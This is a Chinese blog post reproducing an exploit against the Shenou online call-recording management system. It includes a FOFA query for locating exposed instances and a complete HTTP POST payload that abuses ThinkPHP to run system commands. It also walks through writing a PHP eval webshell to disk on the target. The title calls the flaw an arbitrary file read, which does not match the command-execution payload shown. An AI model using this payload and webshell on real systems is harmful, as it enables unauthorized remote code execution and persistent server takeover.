【漏洞复现】申瓯通信 在线录音管理系统 download 任意文件读取漏洞

最新推荐文章于 2024-10-10 21:21:41 发布
最新推荐文章于 2024-10-10 21:21:41 发布
阅读量417 收藏 3
点赞数 4
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140833489
版权

【漏洞复现】申瓯通信 在线录音管理系统 download 任意文件读取漏洞

fofa搜索语法

title="在线录音管理系统"

访问界面

image-20240731171555905

漏洞复现

POC

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52

s=id&_method=__construct&method=POST&filter[]=system

1.网站抓包替换成上面的POC,然后发送到repeater,注意修改HOST为网站IP

image-20240731172132801

image-20240731172224991

2.修改s的值为ls

image-20240731172257667

3.查看robots

image-20240731172323726

4.插入一句话木马

image-20240731172547149

查看php文件内容发现$_post没了

image-20240731172710828

echo "<?php @eval(\$_POST[cmd])?>" >shell.php

image-20240731172818302

代码没问题

image-20240731172844382

删除

image-20240731173013232

image-20240731173025857

黑白时光les
关注
申瓯通信 在线录音管理系统 download 任意文件读取漏洞复现
0xSec
06-17 632
申瓯通信在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
申瓯通信在线录音管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
06-26 244
申瓯通信设备有限公司在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
漏洞复现申瓯通信在线录音管理系统downloa任意文件读取漏洞
a96482的博客
07-31 460
申瓯通信在线录音管理系统 index.php接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
漏洞复现申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞
qq_39894062的博客
06-23 878
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0day 在线录音管理系统download任意文件下载漏洞和RCE命令执行漏洞
weixin_43167326的博客
06-12 814
在线录音管理系统是一种在线社区平台,旨在为用户提供一个共享知识、经验和想法的空间。社交圈子论坛系统除了提供基本的社交功能外,还可以根据用户行为和兴趣为用户推荐相关内容。
申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞复现
0xSec
06-21 715
申瓯通信 在线录音管理系统 存在Thinkphp 远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
漏洞复现申瓯通信 在线录音管理系统 download 任意文件读取漏洞
qq_39894062的博客
06-26 500
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
漏洞复现申瓯通信在线录音管理系统(Thinkphp远程代码执行漏洞
qq_48368964的博客
07-31 262
申瓯通信在线录音管理系统是一款功能强大的录音管理解决方案,旨在满足公司、集团单位在区域分布下对录音数据的集中管理需求。该系统基于SOC1900、S0C1600等系列录音盒开发,是一个多线路、多设备、多区域的录音统一管理平台。该系统将各个分点的录音盒的录音统一集中到服务器,便于总部人员快速查看和管理,从而提升企事业单位的服务质量和管理效率。申瓯通信在线录音管理系统存在Thinkphp远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
在线录音管理系统命令执行漏洞复现(申瓯通信)
2401_86440467的博客
07-31 320
进入fofa,搜索title="在线录音管理系统"将Host中前面的http://与后面的/去掉。发送至重放器(Repeater)复现完成,有问题或是错误欢迎讨论。打开网页,找到为申瓯通信的。将Host改为网站ip。
申瓯HJK-120程控交换机管理系统
01-23
申瓯HJK-120程控交换机管理系统是一款专为申瓯HJK-120系列交换机设计的PC端管理软件,旨在提高通信设备的管理和调试效率,减少传统通过座机进行编程的繁琐步骤。该系统以其便捷的操作界面和强大的功能,为企业通信...
申瓯Soc3100电话交换机管理系统端控制软件.rar
09-05
早期WIN9X/XP系统上运行的管理系统,在WIN7上也能使用,支持综合监控与动态监控。功能包括以下设置项目:中继开关、计费方式、转接方式、发码方式、出局方式、中继方向、拆线方式、H信令、组号、板号是否转发、是否...
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1046
信息安全工程师——机房安全分析与防护篇
T-Box联网安全定义
xxdw1992的博客
10-10 693
T-Box,即Telematics BOX,也称远程信息处理控制单元(Telematics Control Unit,TCU),是车联网中的重要组成部分。它集成了GPS、外部通信接口、电子处理单元、微控制器、移动通信单元和存储器等功能模块,为车端与车联网的连接提供了入口,并为车机等设备提供上网服务。然而,随着其功能的日益强大和联网特性的存在,T-Box的联网安全问题也日益凸显。
【银河麒麟高级服务器操作系统】安全配置基线相关分析全过程及解决方案
银河麒麟操作系统的博客
10-10 535
现象描述:安全基线在银河麒麟高级服务器操作系统V10 sp2和V10 sp3能生效,在V10 sp1-0518系统版本上添加如上内容未生效。系统测试分析情况,可知,在银河麒麟高级服务器操作系统V10系统中,限制实现只有属于wheel组的用户才被允许使用su命令来切换到root用户这个安全基线功能,是需要在/etc/pam.d/su配置文件的pam_wheel.so模块后面,通过追加use_uid这个模块配置参数实现的。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络
鸿蒙的技术博客
10-10 290
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
探索光耦:光耦助力高速电吹风安全与性能的革命性提升
forvevr的博客
10-10 171
一旦电吹风内部温度过高或电路出现故障,光耦能够迅速传递故障信号至控制器,触发自动保护机制,切断电源,从而防止元器件损坏,延长电吹风的使用寿命。综上所述,选择搭载光耦技术的高速电吹风,不仅意味着为头发护理带来了更健康、智能的解决方案,更是对安全性和耐用性的有力保障。这一利用光信号实现电气隔离的电子元件,通过独特的非接触式传输方式,有效隔绝了电路的电气联系,从而显著提高了设备的安全性,避免了高压电路可能带来的风险。其中,光耦(光电耦合器)的引入,无疑为电吹风的性能优化与安全保障开辟了新路径。
数据交换的金钟罩:合理利用安全数据交换系统,确保信息安全
文件数据安全交换
10-10 733
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。因此飞驰云联的安全数据交换系统---《Ftrans Ferry跨网文件安全交换系统》,通过建立可管控可审计、防泄露、安全合规的文件交换通道,解决政府单位在网络隔离条件下, 网间数据安全收发、摆渡和共享的难题,易用便捷,充分释放IT部门人力投入。
深入探讨Windows系统安全:防护策略与漏洞修复的全面指南
最新发布
m0_67484548的博客
10-10 440
深入探讨Windows系统安全:防护策略与漏洞修复的全面指南
申瓯SOC1800电话录音系统安装与Web管理指南
本资源是申瓯通信设备有限公司发布的"SOC1800电话录音系统用户手册",版本为UG-1800-V1.0,发行于2008年5月。该手册详细介绍了申瓯生产的电话录音系统的使用方法和安全注意事项,旨在帮助用户正确安装、配置和维护这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值